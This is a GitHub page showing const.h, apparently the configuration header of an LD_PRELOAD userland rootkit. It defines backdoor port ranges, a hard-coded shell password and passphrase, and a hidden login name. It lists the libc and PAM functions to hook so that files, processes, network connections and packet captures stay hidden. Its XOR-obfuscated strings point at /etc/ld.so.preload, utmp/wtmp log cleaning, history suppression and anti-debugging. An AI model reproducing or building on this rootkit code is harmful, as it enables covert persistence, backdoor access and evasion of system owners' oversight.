-
Notifications
You must be signed in to change notification settings - Fork 177
/
const.h
84 lines (77 loc) · 4.47 KB
/
const.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define _GNU_SOURCE
#ifndef CONST_H
#define CONST_H
//#define DEBUG_APP
#ifdef DEBUG_APP
#define DEBUG(...) fprintf(stderr, __VA_ARGS__);
#else
#define DEBUG(...)
#endif
#define LOW_PORT 61040
#define HIGH_PORT 61050
#define CRYPT_LOW 61051
#define CRYPT_HIGH 61060
#define PAM_PORT 61061
#define MAGIC_STRING "__"
#define BLIND_LOGIN "\x8c\x91\x91\x8a\x93\x9b"
#define C_ROOT "\x8c\x91\x91\x8a"
#define SHELL_MSG "\xa9\x9b\x92\x9d\x91\x93\x9b\xdf\xf4\xb6\x9b\x8c\x9b\xd9\x8d\xde\x9f\xde\x8d\x96\x9b\x92\x92\xc4\xde"
#define SHELL_PASSWD "\x9d\x96\x9f\x90\x99\x9b\x93\x9b"
#define SHELL_TYPE "\xd1\x9c\x97\x90\xd1\x9c\x9f\x8d\x96"
#define PASSPHRASE "\xb6\x9b\x92\x92\x91\xde\xb0\xad\xbf"
#define KEY_SALT "\x9d\x96\x9f\x90\x99\x9b\x93\x9b"
#define ANTI_DEBUG_MSG "\xba\x91\x90\xd9\x8a\xde\x8d\x9d\x8c\x9f\x8a\x9d\x96\xde\x8a\x96\x9b\xde\x89\x9f\x92\x92\x8d"
#define CLEANUP_LOGS "\xbd\xb2\xbb\xbf\xb0\xab\xae\xa1\xb2\xb1\xb9\xad"
#define SYS_ACCEPT 0
#define SYS_ACCESS 1
#define SYS_EXECVE 2
#define SYS_LINK 3
#define SYS_LXSTAT 4
#define SYS_LXSTAT64 5
#define SYS_OPEN 6
#define SYS_RMDIR 7
#define SYS_UNLINK 8
#define SYS_UNLINKAT 9
#define SYS_XSTAT 10
#define SYS_XSTAT64 11
#define SYS_FOPEN 12
#define SYS_FOPEN64 13
#define SYS_OPENDIR 14
#define SYS_READDIR 15
#define SYS_READDIR64 16
#define SYS_PAM_AUTHENTICATE 17
#define SYS_PAM_OPEN_SESSION 18
#define SYS_PAM_ACCT_MGMT 19
#define SYS_GETPWNAM 20
#define SYS_PAM_SM_AUTHENTICATE 21
#define SYS_GETPWNAM_R 22
#define SYS_PCAP_LOOP 23
#define SYSCALL_SIZE 24
#define LD_NORMAL "\xd1\x9b\x8a\x9d\xd1\x92\x9a\xd0\x8d\x91\xd0\x8e\x8c\x9b\x92\x91\x9f\x9a"
#define LD_HIDE "\xd1\x9b\x8a\x9d\xd1\xd0\x92\x9a\xd0\x8d\x91\xd0\x8e\x8c\x9b\x92\x91\x9f\x9a"
#define SYS_WRITE "\x89\x8c\x97\x8a\x9b"
#define SYS_READ "\x8c\x9b\x9f\x9a"
#define HIST_FILE "\xb6\xb7\xad\xaa\xb8\xb7\xb2\xbb\xc3\xd1\x9a\x9b\x88\xd1\x90\x8b\x92\x92"
#define C_UNHIDE "\x9c\x97\x90\xd1\x8b\x90\x96\x97\x9a\x9b"
#define C_LDD "\x9c\x97\x90\xd1\x92\x9a\x9a"
#define PROC_NET_TCP "\xd1\x8e\x8c\x91\x9d\xd1\x90\x9b\x8a\xd1\x8a\x9d\x8e"
#define PROC_NET_TCP6 "\xd1\x8e\x8c\x91\x9d\xd1\x90\x9b\x8a\xd1\x8a\x9d\x8e\xc8"
#define CONFIG_FILE "\x92\x9a\xd0\x8d\x91\xd0\x8e\x8c\x9b\x92\x91\x9f\x9a"
#define PROC_PATH "\xd1\x8e\x8c\x91\x9d\xd1"
#define CMD_LINE "\xdb\x8d\xd1\x9d\x93\x9a\x92\x97\x90\x9b"
#define ENV_LINE "\xdb\x8d\xd1\x9b\x90\x88\x97\x8c\x91\x90"
#define PROC_STR "\xd1\x8e\x8c\x91\x9d\xd1\xdb\x8d"
#define SCANF_LINE "\xdb\x9a\xc4\xde\xdb\xc8\xca\xa5\xce\xd3\xc7\xbf\xd3\xb8\x9f\xd3\x98\xa3\xc4\xdb\xa6\xde\xdb\xc8\xca\xa5\xce\xd3\xc7\xbf\xd3\xb8\x9f\xd3\x98\xa3\xc4\xdb\xa6\xde\xdb\xa6\xde\xdb\x92\xa6\xc4\xdb\x92\xa6\xde\xdb\xa6\xc4\xdb\x92\xa6\xde\xdb\x92\xa6\xde\xdb\x9a\xde\xdb\x9a\xde\xdb\x92\x8b\xde\xdb\xcb\xcf\xcc\x8d\xf4"
#define LD_TRACE "\xb2\xba\xa1\xaa\xac\xbf\xbd\xbb\xa1\xb2\xb1\xbf\xba\xbb\xba\xa1\xb1\xbc\xb4\xbb\xbd\xaa\xad"
#define LD_LINUX "\x92\x9a\xd3\x92\x97\x90\x8b\x86"
#define UTMP_MSG "\x8b\x8a\x93\x8e\xde\x92\x91\x99\x8d\xde\x9d\x92\x9b\x9f\x90\x9b\x9a\xde\x8b\x8e\xd0"
#define WTMP_MSG "\x89\x8a\x93\x8e\xde\x92\x91\x99\x8d\xde\x9d\x92\x9b\x9f\x90\x9b\x9a\xde\x8b\x8e\xd0"
#define UTMP_FILE_X "\xd1\x88\x9f\x8c\xd1\x92\x91\x99\xd1\x8b\x8a\x93\x8e"
#define WTMP_FILE_X "\xd1\x88\x9f\x8c\xd1\x92\x91\x99\xd1\x89\x8a\x93\x8e"
#define HISTFILE "\xb6\xb7\xad\xaa\xb8\xb7\xb2\xbb"
#define TERM "\xaa\xbb\xac\xb3\xc3\x86\x8a\x9b\x8c\x93"
#define HIDE_TERM_VAR "\xb6\xb7\xba\xbb\xa1\xaa\xb6\xb7\xad\xa1\xad\xb6\xbb\xb2\xb2\xc3\x8e\x92\x9b\x9f\x8d\x9b"
#define HIDE_TERM_STR "\xb6\xb7\xba\xbb\xa1\xaa\xb6\xb7\xad\xa1\xad\xb6\xbb\xb2\xb2"
static char *syscall_table[SYSCALL_SIZE] = {
"\x9f\x9d\x9d\x9b\x8e\x8a", "\x9f\x9d\x9d\x9b\x8d\x8d", "\x9b\x86\x9b\x9d\x88\x9b", "\x92\x97\x90\x95", "\xa1\xa1\x92\x86\x8d\x8a\x9f\x8a", "\xa1\xa1\x92\x86\x8d\x8a\x9f\x8a\xc8\xca", "\x91\x8e\x9b\x90", "\x8c\x93\x9a\x97\x8c", "\x8b\x90\x92\x97\x90\x95", "\x8b\x90\x92\x97\x90\x95\x9f\x8a", "\xa1\xa1\x86\x8d\x8a\x9f\x8a", "\xa1\xa1\x86\x8d\x8a\x9f\x8a\xc8\xca", "\x98\x91\x8e\x9b\x90", "\x98\x91\x8e\x9b\x90\xc8\xca", "\x91\x8e\x9b\x90\x9a\x97\x8c", "\x8c\x9b\x9f\x9a\x9a\x97\x8c", "\x8c\x9b\x9f\x9a\x9a\x97\x8c\xc8\xca", "\x8e\x9f\x93\xa1\x9f\x8b\x8a\x96\x9b\x90\x8a\x97\x9d\x9f\x8a\x9b", "\x8e\x9f\x93\xa1\x91\x8e\x9b\x90\xa1\x8d\x9b\x8d\x8d\x97\x91\x90", "\x8e\x9f\x93\xa1\x9f\x9d\x9d\x8a\xa1\x93\x99\x93\x8a", "\x99\x9b\x8a\x8e\x89\x90\x9f\x93", "\x8e\x9f\x93\xa1\x8d\x93\xa1\x9f\x8b\x8a\x96\x9b\x90\x8a\x97\x9d\x9f\x8a\x9b", "\x99\x9b\x8a\x8e\x89\x90\x9f\x93\xa1\x8c", "\x8e\x9d\x9f\x8e\xa1\x92\x91\x91\x8e"};
#endif